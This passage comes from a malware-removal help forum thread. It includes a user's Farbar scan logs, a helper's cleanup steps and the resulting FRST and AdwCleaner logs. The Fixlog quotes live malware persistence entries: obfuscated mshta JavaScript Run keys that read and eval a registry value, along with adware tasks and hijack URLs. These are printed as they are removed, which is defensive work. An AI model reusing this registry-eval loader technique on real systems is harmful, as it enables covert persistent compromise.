FirewallRules: [{DBF371C3-237D-4751-9C70-87A53E677DC0}] => (Allow) C:\Program Files (x86)\Steam\bin\steamwebhelper.exe
FirewallRules: [{D6B7CD85-DFFE-4704-BA03-0529A677E937}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{4DA0B675-E975-4A4F-ADF2-32FE5A276CFE}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{D7D836E3-8CFB-4286-9448-AFA43DE8A14C}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{91F33041-8B36-4196-BD29-22691F2B4B95}] => (Allow) C:\Windows\SysWOW64\PnkBstrB.exe
FirewallRules: [{ACE656B5-CA11-48EF-8E84-ED043B7658A7}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{CD967D7F-8C07-40DD-995C-7037EC36D72B}] => (Allow) C:\Windows\SysWOW64\PnkBstrA.exe
FirewallRules: [{06B8C773-4FC4-49F0-BC7E-9A735F0EA04A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{95FC2FD6-528F-4F61-BE05-36F128223F82}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{FDC73C5D-7E50-455A-9F11-8734B1B1598F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{3886009A-770E-4923-8266-34E6645D4FAB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\PAYDAY 2\payday2_win32_release.exe
FirewallRules: [{DF6E593E-34F0-4910-A2D7-CEA691781495}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{85F8C270-1DC0-4A24-9A1C-8AB64D9EA22F}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\Binaries\Win64\CMW.exe
FirewallRules: [{E5E7222B-E284-4741-9A7B-B6B562FAF081}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\CDW\Binaries\Win64\CDW.exe
FirewallRules: [{A377094A-401E-476B-8E5A-EAAAE3232166}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\CDW\Binaries\Win64\CDW.exe
FirewallRules: [{5D3417A3-59D6-4D32-B0E1-F7E9F78C0D02}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{DE29835D-A400-46A0-BB90-0BE00940662D}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\Binaries\Win32\CMW.exe
FirewallRules: [{E603F54A-E38E-413B-87C1-C35D988393A3}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\CDW\Binaries\Win32\CDW.exe
FirewallRules: [{4386AB82-8346-42F1-9795-F29CECDE3BB5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\CDW\Binaries\Win32\CDW.exe
FirewallRules: [{820937CA-7260-4AC9-85B1-546DD24938DD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{E3EF4C44-3601-4D35-B0BF-5CD6886F0455}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\chivalrymedievalwarfare\ChivLauncher.exe
FirewallRules: [{086C9CEB-5523-4305-ACF6-92104FCF422E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\diriptide\DeadIslandGame_x86_rwdi.exe
FirewallRules: [{82591B60-7933-468C-9BA8-229D2D06679E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\diriptide\DeadIslandGame_x86_rwdi.exe
FirewallRules: [{852CFB77-576C-47B4-8603-4732CBB6F6E2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Wargame Airland Battle\WarGame2.exe
FirewallRules: [{E7A8E174-9366-446E-A1B0-0BD8D79AA70E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Wargame Airland Battle\WarGame2.exe
FirewallRules: [{4F1873FE-3D71-40AB-B201-178A1CB69DA7}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Just Cause 2\JustCause2.exe
FirewallRules: [{DA687470-E5FC-472E-BF08-6D5FD180E6D8}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Just Cause 2\JustCause2.exe
FirewallRules: [{B877BBC2-4217-448D-BEDF-30BC0C20B597}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Just Cause 2 - Multiplayer Mod\JcmpLauncher.exe
FirewallRules: [{2988120C-5E98-4290-AD96-EE5BAB86B7EC}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Just Cause 2 - Multiplayer Mod\JcmpLauncher.exe
FirewallRules: [{918D81FA-E3C6-4AF5-9F3E-7B942C00FA3A}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4WebHelper.exe
FirewallRules: [{DF3E899F-5BBC-415A-A6F7-652E077A850A}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4WebHelper.exe
FirewallRules: [{875D458C-865B-493B-BF81-AF5EA9DE0E01}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4X86WebHelper.exe
FirewallRules: [{85873354-C123-4DE2-92C1-96ABC8117BDD}] => (Allow) C:\Program Files (x86)\Origin Games\Battlefield 4\BF4X86WebHelper.exe
FirewallRules: [{71DF5B68-00D4-4D0C-972F-2703E4F5ED51}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Frozen Synapse\FrozenSynapse.exe
FirewallRules: [{4EBABBB9-5122-4698-BEE1-914C097C620E}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Frozen Synapse\FrozenSynapse.exe
FirewallRules: [{65DBF3A7-19F1-4871-A19D-EAA164DAFF60}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Bugbear Entertainment\Wreckfest.exe
FirewallRules: [{FA3001C1-4F2A-44FB-AA81-3ADD23F62A99}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Bugbear Entertainment\Wreckfest.exe
FirewallRules: [{48009764-6DCF-4D15-9537-647E2EA6DF40}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Bugbear Entertainment\Wreckfest_x64.exe
FirewallRules: [{FFC11991-03C2-4374-AEA7-89A8216FB62A}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Bugbear Entertainment\Wreckfest_x64.exe
FirewallRules: [{0B7CBFDE-FC53-44CA-B420-E43744524569}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Nidhogg\Nidhogg.exe
FirewallRules: [{F22AC200-23E4-4030-B86B-1964D6B5EB86}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Nidhogg\Nidhogg.exe
FirewallRules: [{C2A2B1EE-C940-4BCB-AC9D-AA9B3FB72460}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Red Faction Guerrilla\rfg_launcher.exe
FirewallRules: [{8D6CAA2D-88AF-489E-A43F-3C9F55EB24EA}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Red Faction Guerrilla\rfg_launcher.exe
FirewallRules: [{019BEB4D-3D71-4C13-B5C7-B7BD6F5513C0}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Red Faction Guerrilla\rfg.exe
FirewallRules: [{140A7E75-AABC-4860-B65C-325254D1A3C5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Red Faction Guerrilla\rfg.exe
FirewallRules: [{CE3A92E1-23CF-43E7-B52B-AD9E7378E943}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{AF86B38D-CB8E-4BED-8F59-46F0AAF973DD}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Kerbal Space Program\KSP.exe
FirewallRules: [{39DA35F4-416C-4637-ADF6-92B84CD4F05B}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{9A7D680F-A21E-4057-966F-98735EEF75FE}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\Guns of Icarus Online\workshop\Workshop.exe
FirewallRules: [{DCE6E5AF-D68F-417C-9351-9488CD6E47AB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\From The Depths\From_The_Depths.exe
FirewallRules: [{74F78911-D34C-4FAB-959B-CA0484D7C6E5}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\From The Depths\From_The_Depths.exe
FirewallRules: [TCP Query User{88251A9F-47A8-4368-933A-3B05F320C8B5}C:\program files (x86)\origin games\battlefield 4\bf4.exe] => (Allow) C:\program files (x86)\origin games\battlefield 4\bf4.exe
FirewallRules: [UDP Query User{57723E4D-2FFF-4A4B-9A92-3588617F21A6}C:\program files (x86)\origin games\battlefield 4\bf4.exe] => (Allow) C:\program files (x86)\origin games\battlefield 4\bf4.exe
FirewallRules: [{36AE062E-B01F-4FE3-AF10-9EC7333907D2}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\BlockNLoad\Win64\BlockNLoad.exe
FirewallRules: [{297FC07E-524F-4BD2-94D1-45A82F6838EB}] => (Allow) C:\Program Files (x86)\Steam\SteamApps\common\BlockNLoad\Win64\BlockNLoad.exe
FirewallRules: [TCP Query User{7BE0F728-65F5-458D-8BD3-F11D7C40BF7D}C:\warthunder\aces.exe] => (Allow) C:\warthunder\aces.exe
FirewallRules: [UDP Query User{6FF58E4E-E291-4B8D-9325-A775B8E91F0F}C:\warthunder\aces.exe] => (Allow) C:\warthunder\aces.exe
FirewallRules: [TCP Query User{32421D5B-BF64-41FC-89DF-F1CE3B660570}C:\games\world_of_warships\wowslauncher.exe] => (Allow) C:\games\world_of_warships\wowslauncher.exe
FirewallRules: [UDP Query User{8CCE39C2-2444-450B-B348-42E9F0C67410}C:\games\world_of_warships\wowslauncher.exe] => (Allow) C:\games\world_of_warships\wowslauncher.exe
FirewallRules: [{06170D4C-B6E2-4613-986C-1A2205842395}] => (Allow) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
FirewallRules: [TCP Query User{F66ACF95-C3DA-46C1-AFA4-084B5D78DB7F}C:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe
FirewallRules: [UDP Query User{C09F63E4-700F-4DD4-B703-2F100CAF5144}C:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe] => (Allow) C:\program files (x86)\steam\steamapps\common\planetside 2\planetside2_x64.exe
==================== Faulty Device Manager Devices =============
Name: Unknown USB Device (Device Descriptor Request Failed)
Description: Unknown USB Device (Device Descriptor Request Failed)
Class Guid: {36fc9e60-c465-11cf-8056-444553540000}
Manufacturer: (Standard USB Host Controller)
Service:
Problem: : Windows has stopped this device because it has reported problems. (Code 43)
Resolution: One of the drivers controlling the device notified the operating system that the device failed in some manner. For more information about how to diagnose the problem, see the hardware documentation.
==================== Event log errors: =========================
Application errors:
==================
Error: (12/10/2015 02:58:57 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: The program explorer.exe version 10.0.10240.16603 stopped interacting with Windows and was closed. To see if more information about the problem is available, check the problem history in the Security and Maintenance control panel.
Process ID: 120c
Start Time: 01d1339c5bbfaa01
Termination Time: 0
Application Path: C:\Windows\explorer.exe
Report Id: 82bd26f0-9f91-11e5-8dd9-1c6f65a98371
Faulting package full name:
Faulting package-relative application ID:
Error: (12/10/2015 02:41:28 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: GameScannerService.exe, version: 1.0.6.2662, time stamp: 0x56030e8a
Faulting module name: KERNELBASE.dll, version: 10.0.10240.16384, time stamp: 0x559f3b2a
Exception code: 0xe0434352
Fault offset: 0x000b3e28
Faulting process id: 0xa24
Faulting application start time: 0xGameScannerService.exe0
Faulting application path: GameScannerService.exe1
Faulting module path: GameScannerService.exe2
Report Id: GameScannerService.exe3
Faulting package full name: GameScannerService.exe4
Faulting package-relative application ID: GameScannerService.exe5
Error: (12/10/2015 02:41:25 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: GameScannerService.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.BadImageFormatException
Stack:
at Razer.GameScannerService.GameScannerService..ctor()
at Razer.GameScannerService.Program.Main()
Error: (12/10/2015 06:10:30 AM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (27136) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
Error: (12/10/2015 06:10:30 AM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (27136) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ". The create file operation will fail with error -1032 (0xfffffbf8).
Error: (12/10/2015 06:10:20 AM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (27136) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
Error: (12/10/2015 06:10:20 AM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (27136) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ". The create file operation will fail with error -1032 (0xfffffbf8).
Error: (12/10/2015 06:10:09 AM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (27136) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
Error: (12/10/2015 06:10:09 AM) (Source: ESENT) (EventID: 488) (User: )
Description: SettingSyncHost (27136) An attempt to create the file "C:\WINDOWS\system32\edbtmp.log" failed with system error 5 (0x00000005): "Access is denied. ". The create file operation will fail with error -1032 (0xfffffbf8).
Error: (12/10/2015 06:09:59 AM) (Source: ESENT) (EventID: 413) (User: )
Description: SettingSyncHost (27136) Unable to create a new logfile because the database cannot write to the log drive. The drive may be read-only, out of disk space, misconfigured, or corrupted. Error -1032.
System errors:
=============
Error: (12/10/2015 05:13:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
Error: (12/10/2015 05:09:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
Error: (12/10/2015 05:05:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
Error: (12/10/2015 05:01:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
Error: (12/10/2015 04:57:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
Error: (12/10/2015 04:53:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
Error: (12/10/2015 04:49:15 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
Error: (12/10/2015 04:45:12 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
Error: (12/10/2015 03:24:01 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
Error: (12/10/2015 03:20:01 PM) (Source: DCOM) (EventID: 10029) (User: NT AUTHORITY)
Description: {752073A1-23F2-4396-85F0-8FDB879ED0ED}TrustedInstaller
==================== Memory info ===========================
Processor: AMD Phenom™ II X6 1100T Processor
Percentage of memory in use: 26%
Total physical RAM: 16381.55 MB
Available physical RAM: 12035.82 MB
Total Virtual: 32765.55 MB
Available Virtual: 28175.78 MB
==================== Drives ================================
Drive c: () (Fixed) (Total:1862.92 GB) (Free:973.49 GB) NTFS ==>[drive with boot components (obtained from BCD)]
Drive f: (Youtube & Extra) (Fixed) (Total:465.76 GB) (Free:429.15 GB) NTFS
Drive j: (Movies) (Fixed) (Total:1397.17 GB) (Free:1266 GB) NTFS
==================== MBR & Partition Table ==================
========================================================
Disk: 0 (MBR Code: Windows 7 or 8) (Size: 1397.3 GB) (Disk ID: 00004C34)
Partition 1: (Not Active) - (Size=1397.2 GB) - (Type=07 NTFS)
========================================================
Disk: 1 (MBR Code: Windows 7 or 8) (Size: 465.8 GB) (Disk ID: 000B90AB)
Partition 1: (Not Active) - (Size=465.8 GB) - (Type=07 NTFS)
========================================================
Disk: 2 (MBR Code: Windows 7 or 8) (Size: 1863 GB) (Disk ID: 0E584CAF)
Partition 1: (Active) - (Size=1862.9 GB) - (Type=07 NTFS)
==================== End of Addition.txt ============================
#5
Posted 10 December 2015 - 08:18 PM
BrianDrab
-
- Malware Removal
-
- 3,591 posts
Trusted Helper
Thanks. Please do the following.
Step#1 - Warnings
The Dangers of P2P Programs
IMPORTANT: I noticed that you have a P2P (Peer to Peer) file sharing program on your computer. I cannot stress highly enough the danger in using these types of programs. P2P programs are one of the major avenues of infection these days. The files downloaded with these programs are more than likely infected with trojans, malware, rootkits, etc.
You run the risk of getting an infection that can compromise your sensitive data, such as financial records, personal information, etc. That is just the infection aspect of using P2P programs. You also run the risk of possible arrest, fines, or in severe cases, jail time for illegal downloading of copyrighted material.
Here are some information sources about the dangers of P2P programs:
FBI - Peer to Peer Scams
USA Today Artticle on P2P Programs
File Sharing Infects 500,000 Computers
I very much recommend you uninstall this program from your machine. If not, you will likely be back needing help with your machine again. The risks of infections from content downloaded with P2P programs far outweigh any benefit of using them.
It is, of course, your choice as to whether or not you remove the program from your machine. It is my duty though, to point out how dangerous it is to use these programs. However, I must request that you do not use it while we are cleaning your machine.
Please uninstall the following Peer-to-Peer program(s): uTorrent
Step#2 - FRST Fix
NOTICE: This script was written specifically for this user, for use on that particular machine. Running this on another machine may cause damage to your operating system
1. Download attached file and save it to the Desktop. 
fixlist.txt 2.69KB
295 downloads
Note. It's important that both files, FRST64 and fixlist.txt are in the same location or the fix will not work (in this case...the desktop).
2. Run FRST64 by Right-Clicking on the file and choosing Run as administrator.
3. Press the Fix button just once and wait. If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.
4. When finished FRST64 will generate a log on the Desktop (Fixlog.txt). Please post the contents of it in your reply.
Step#3 - AdWCleaner
1. Please download AdwCleaner by Xplode onto your desktop.
2. Close all open programs and internet browsers.
3. Right-click on AdwCleaner.exe and select Run as administrator to run the tool. Click I agree if you agree with the terms of use.
4. Click on Scan.
5. After the scan is complete click on "Cleaning"
6. Confirm each time with Ok.
7. Your computer will be rebooted automatically. A text file will open after the restart.
8. Please post the content of that logfile with your next answer.
9. If need be, you can also find the logfile at C:\AdwCleaner\AdwCleaner[C1].txt as well.
Items for your next post
1. FixLog.txt
2. AdwCleaner log
#6
Posted 10 December 2015 - 09:59 PM
jake1master
- Topic Starter
-
- Member
-
- 10 posts
Member
Fix result of Farbar Recovery Scan Tool (x64) Version:09-12-2015
Ran by PimpSlap (2015-12-10 19:32:47) Run:1
Running from C:\Users\PimpSlap\Desktop
Loaded Profiles: PimpSlap (Available Profiles: PimpSlap)
Boot Mode: Normal
==============================================
fixlist content:
*****************
CreateRestorePoint:
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
(Microsoft Corporation) C:\Windows\SysWOW64\regsvr32.exe
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [WindApp] => "C:\Users\PimpSlap\AppData\Roaming\Store\WindApp\WindApp.exe" /winstartup
C:\Users\PimpSlap\AppData\Roaming\Store\WindApp
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [Selection Tools] => "C:\Users\PimpSlap\AppData\Roaming\WTools\Selection Tools\Selection Tools.exe" /winstartup
C:\Users\PimpSlap\AppData\Roaming\WTools
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**bfa63c00<*>] => mshta javascript:tg5Av9BK="F7FU0VZ6tm";Q2k=new%20ActiveXObject("WScript.Shell");TvtxAYj0="5EsUzy";nTa5r6=Q2k.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");MLUFn3l="dr9X";eval(nTa5r6);sKu0ZwI="RwVzRS (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\...\Run: [**10548e12<*>] => mshta javascript:aRV1SL8ci="1Vhox";U1z3=new%20ActiveXObject("WScript.Shell");Kc5EZWrY="10ceYvbH";O4eIG=U1z3.RegRead("HKCU\\software\\a5b384e525\\7c6671cf");pN6ujpZ6iw="cw";eval(O4eIG);jrwYec53i="SGxNZ (the data entry has 4 more characters). <===== ATTENTION (Value Name with invalid characters)
FF Homepage: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f
FF NewTab: hxxp://www-searching.com/?site=shyosffdefault&prd=set&s=FB1zamobl03687,6948c77b-0cfd-43cf-98e1-8e5b9952202f
FF Extension: No Name - C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\extensions\[email protected] [not found]
S2 NetTcpHandler; C:\Users\PimpSlap\AppData\Roaming\NetService\netservice.exe -start [X]
C:\Users\PimpSlap\AppData\Roaming\NetService
CustomCLSID: HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{5F63E8CB-8F57-490A-97FE-62BC2F2A5EA4}\InprocServer32 -> no filepath
Task: {31718128-098F-4BB9-BAE0-DE20FCC657AB} - System32\Tasks\Installer_smknnodesk => C:\Users\PimpSlap\AppData\Local\Installer\Installsmknnodesk_32556\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {A91E6011-C8AE-4509-9EE9-6DB4B2051670} - System32\Tasks\Installer_DSKB => C:\Users\PimpSlap\AppData\Local\Installer\InstallDSKB_27758\brakieamo_amobl_inst.exe <==== ATTENTION
Task: {D42682DB-910D-46BF-950F-584A6578B3A2} - System32\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
Task: C:\WINDOWS\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D.job => C:\Program Files (x86)\ParetoLogic\RegCure Pro\RegCurePro.exe <==== ATTENTION
EmptyTemp:
*****************
Restore point was successfully created.
[7864] C:\Windows\SysWOW64\regsvr32.exe => process closed successfully.
[7988] C:\Windows\SysWOW64\regsvr32.exe => process closed successfully.
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Windows\CurrentVersion\Run\\WindApp => value removed successfully
"C:\Users\PimpSlap\AppData\Roaming\Store\WindApp" => not found.
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Windows\CurrentVersion\Run\\Selection Tools => value removed successfully
C:\Users\PimpSlap\AppData\Roaming\WTools => moved successfully
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**bfa63c00<*> => value removed successfully
HKU\S-1-5-21-1710800545-2821560886-2955275411-1000\Software\Microsoft\Windows\CurrentVersion\Run\\**10548e12<*> => value removed successfully
Firefox "homepage" removed successfully
Firefox "newtab" removed successfully
C:\Users\PimpSlap\AppData\Roaming\Mozilla\Firefox\Profiles\7ugsozrc.default\extensions\[email protected] => path removed successfully
NetTcpHandler => service removed successfully
"C:\Users\PimpSlap\AppData\Roaming\NetService" => not found.
"HKU\S-1-5-21-1710800545-2821560886-2955275411-1000_Classes\CLSID\{5F63E8CB-8F57-490A-97FE-62BC2F2A5EA4}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{31718128-098F-4BB9-BAE0-DE20FCC657AB}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{31718128-098F-4BB9-BAE0-DE20FCC657AB}" => key removed successfully
C:\WINDOWS\System32\Tasks\Installer_smknnodesk => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Installer_smknnodesk" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Logon\{A91E6011-C8AE-4509-9EE9-6DB4B2051670}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{A91E6011-C8AE-4509-9EE9-6DB4B2051670}" => key removed successfully
C:\WINDOWS\System32\Tasks\Installer_DSKB => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Installer_DSKB" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{D42682DB-910D-46BF-950F-584A6578B3A2}" => key removed successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{D42682DB-910D-46BF-950F-584A6578B3A2}" => key removed successfully
C:\WINDOWS\System32\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D => moved successfully
"HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D" => key removed successfully
C:\WINDOWS\Tasks\RegCure Pro_sch_432DFCFC-3664-11E5-885B-00309140240D.job => moved successfully
EmptyTemp: => 3.8 GB temporary data Removed.
The system needed a reboot.
==== End of Fixlog 19:43:55 ====
I will get back to you with the results of the AdW scan, I wont be able to contact you until around 3 PM (Pacific) tomorrow. Thank you for your help so far 
#7
Posted 10 December 2015 - 10:03 PM
jake1master
- Topic Starter
-
- Member
-
- 10 posts
Member
Actually, that scan completed a lot faster than I thought! I will have to restart after I clean, but I will get that log to you after the restart.
#8
Posted 10 December 2015 - 10:04 PM
BrianDrab
-
- Malware Removal
-
- 3,591 posts
Trusted Helper
Excellent and then let me know how your machine is functioning.
#9
Posted 10 December 2015 - 10:08 PM
jake1master
- Topic Starter
-
- Member
-
- 10 posts
Member
# AdwCleaner v5.024 - Logfile created 10/12/2015 at 20:03:22
# Updated 07/12/2015 by Xplode
# Database : 2015-12-07.3 [Server]
# Operating system : Windows 10 Pro (x64)
# Username : PimpSlap - PIMPSLAP-PC
# Running from : C:\Users\PimpSlap\Desktop\AdwCleaner.exe
# Option : Cleaning
# Support : http://toolslib.net/forum
***** [ Services ] *****
[-] Service Deleted : swdumon
***** [ Folders ] *****
[-] Folder Deleted : C:\Program Files (x86)\Probit Software
[-] Folder Deleted : C:\Program Files (x86)\Itibiti Soft Phone
[-] Folder Deleted : C:\ProgramData\ParetoLogic
[-] Folder Deleted : C:\ProgramData\{0b5148ad-4b38-a96b-0b51-148ad4b322b5}
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\slimware utilities inc
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\InstallDSKB_27758
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_10144
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_10147
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_10333
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_10452
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_10487
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_10981
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_11096
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_11263
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_11336
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_11528
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_11710
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_11816
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_11947
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_12120
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_12123
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_12461
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_12489
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_12827
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_12933
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_13171
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_13220
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_13226
[-] Folder Deleted : C:\Users\PimpSlap\AppData\Local\Installer\Install_13249
